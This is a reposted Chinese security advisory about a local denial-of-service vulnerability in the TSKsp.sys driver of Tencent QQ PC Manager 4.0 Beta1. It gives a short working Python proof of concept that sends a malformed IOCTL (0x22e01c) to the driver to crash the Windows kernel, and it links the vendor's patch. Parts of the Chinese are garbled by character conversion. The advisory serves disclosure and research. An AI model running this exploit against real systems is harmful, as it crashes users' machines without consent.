QQ电脑管家TSKsp.sys驱动本地回绝服务漏洞及修复[网络技术]
本文“QQ电脑管家TSKsp.sys驱动本地回绝服务漏洞及修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
影响版本:
Tencent QQ电脑管家 4.0 Beta1漏洞描写:
QQ电脑管家是QQ医生3.3的进级版本,主要功效包含安全防护、系统优化和软件管理.
QQ电脑管家所安装的TSKsp.sys驱动没有精确地考证用户所提交的调用参数,本地用户可以通过提反目意的IOCTL恳求招致内核崩溃.
<*参考
Lufeng Li (lilf@neusoft.com)
*>
测试办法:
本站供应程序(办法)大概带有攻击性,仅供安全研究与讲授之用,风险自负!
#!/usr/bin/python
#################################################################
#
# Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: http://pcmgr.qq.com
# Vulnerable App: http://dl_dir2.qq.com/invc/qqmaster/setup/QQPCMgr_Setup.exe
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQpcmgr v4.0Beta1
# Vulnerable: QQpcmgr<=v4.0Beta1
#
#################################################################
from ctypes import *
kernel32 = windll.kernel32
Psapi = windll.Psapi
if __name__ == '__main__':
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2
DEVICE_NAME = "\\\\.\\tsksp"
dwReturn = c_ulong()
out_data = ''
in_data = ''
driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data,0, out_data, 0,byref(dwReturn), None)
厂商补钉:
Tencent
http://dl_dir2.qq.com/invc/qqpcmgr/setup/QQPCMgr_Setup_40_286.exe
以上是“QQ电脑管家TSKsp.sys驱动本地回绝服务漏洞及修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |